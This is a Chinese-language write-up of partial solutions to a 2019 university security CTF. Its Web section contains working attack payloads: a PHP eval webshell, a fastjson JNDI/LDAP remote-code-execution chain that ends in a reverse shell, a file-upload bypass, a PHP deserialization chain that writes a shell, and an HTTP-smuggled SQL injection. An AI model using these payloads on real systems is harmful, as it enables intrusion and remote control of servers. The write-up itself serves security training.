2019 高校网络信息安全管理运维挑战赛 部分题解
这个幼儿园也太牛逼了。
Web
ezbypass
直接写个🐎。
1 | /?cmd=file_put_contents("/tmp/south.php","<?php eval(\$_POST['south']);?>"); |
然后蚁剑右键绕过disable_function。
1 | flag{bypass_disable_function_by_Nday_9e0c14fbba82b37} |
ezjava
没啥好说的,fastjson-1.2.47-RCE漏洞复现。
修改Exploit.java。
1 | public class Exploit { |
编译后启用服务。
1 | java - marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://123123123/#Exploit |
然后发送Payload。
1 | POST /ezjava/ HTTP/1.1 |
监听到反弹Shell。
1 | flag{jndi_injection_by_ldap_3232} |
ezupload
提示了login.php.swp,看了一下,发送空用户名不发送密码就可以绕过。
1 | http://111.186.57.61:10501/ |
上🐴,修改文件头为GIF89a,后缀名为phtml。
1 | POST /upload.php HTTP/1.1 |
得到flag{logical_bypass_not_weak_password}。
ezpop
1 |
|
1 | /?src=&data=O:1:"A":4:{s:8:"*store";O:1:"B":1:{s:7:"options";a:3:{s:6:"prefix";s:69:"php://filter/write=convert.base64-decode/resource=./uploads/south.php";s:9:"serialize";s:13:"base64_decode";s:13:"data_compress";i:0;}}s:6:"*key";s:0:"";s:9:"*expire";i:1;s:5:"cache";a:1:{s:72:"111111111111UEQ5d2FIQWdaWFpoYkNna1gxQlBVMVJiSjNOdmRYUm9KMTBwT3o4KzU1Q0E=";a:0:{}}} |
ezwaf
HTTP走私。
1 | POST /?src=&age=1%20or%20if(1=1,sleep(1),10) HTTP/1.1 |
Misc
misc2
1 | #!/usr/bin/env python |
文件描述符里翻到了。
1 | http://111.186.57.61:10701/r |
misc3
下载后打开,有一段。
1 | ‌​​‌‌​​‌‌​​‌​​‌‌‌​​‌‌‌‌​‌​​‌‌​​​‌​​​​‌​​‌​​‌‌​‌​‌‌​​‌‌​‌‌​​‌‌‌‌​‌‌​​​‌‌​‌​​‌‌‌​​‌‌​​​‌‌‌‌​​‌‌‌​‌‌‌​​‌‌‌​‌‌​​‌‌‌​‌‌​​‌​​​‌‌​​‌​‌​‌​​‌‌​‌​‌‌​​‌​​‌‌‌​​‌​​‌‌​​‌‌‌​​‌​​‌‌​​‌‌‌​​‌‌​‌‌‌​​‌‌‌​‌​​‌‌​​‌‌‌​​​‌‌‌‌‌​​‌​‌​‌‌​​​‌‌​‌‌​​‌‌​​‌​​‌‌‌​‌‌​​‌‌‌​​‌‌​​​‌‌‌‌‌​​‌​‌​‌​​‌‌‌​‌‌​​‌‌​​‌‌‌​​​‌‌​‌‌​​‌‌​​‌‌​​​‌‌​‌​​​​​‌​ |
zwnj改为0以及#8203改为1,转字符串。
1 | res = "‌​​‌‌​​‌‌​​‌​​‌‌‌​​‌‌‌‌​‌​​‌‌​​​‌​​​​‌​​‌​​‌‌​‌​‌‌​​‌‌​‌‌​​‌‌‌‌​‌‌​​​‌‌​‌​​‌‌‌​​‌‌​​​‌‌‌‌​​‌‌‌​‌‌‌​​‌‌‌​‌‌​​‌‌‌​‌‌​​‌​​​‌‌​​‌​‌​‌​​‌‌​‌​‌‌​​‌​​‌‌‌​​‌​​‌‌​​‌‌‌​​‌​​‌‌​​‌‌‌​​‌‌​‌‌‌​​‌‌‌​‌​​‌‌​​‌‌‌​​​‌‌‌‌‌​​‌​‌​‌‌​​​‌‌​‌‌​​‌‌​​‌​​‌‌‌​‌‌​​‌‌‌​​‌‌​​​‌‌‌‌‌​​‌​‌​‌​​‌‌‌​‌‌​​‌‌​​‌‌‌​​​‌‌​‌‌​​‌‌​​‌‌​​​‌‌​‌​​​​​‌​".replace('‌', '0').replace('​', '1') |
webshell
流量分析,得到后门。
1 |
|
然后解出aes加密后的数据。
1 |
|
twocats
盲水印,随便找个脚本解得。
Reserve
re1
1 | bi = [0xAB, 0xB3, 0x01, 0xEE, 0x11, 0x07, 0x15, 0x6D, 0x5F, 0x93, 0x15, 0x25, 0x5C, 0x5A, 0x69, 0x78, 0xFF, 0xE1, 0x5F, |
re2
打开z3解。
1 | from z3 import * |
Crypto
rsa1
说来也巧,上两周的福建省赛刚解过一次同类型的。
1 | from Crypto.Util.number import * |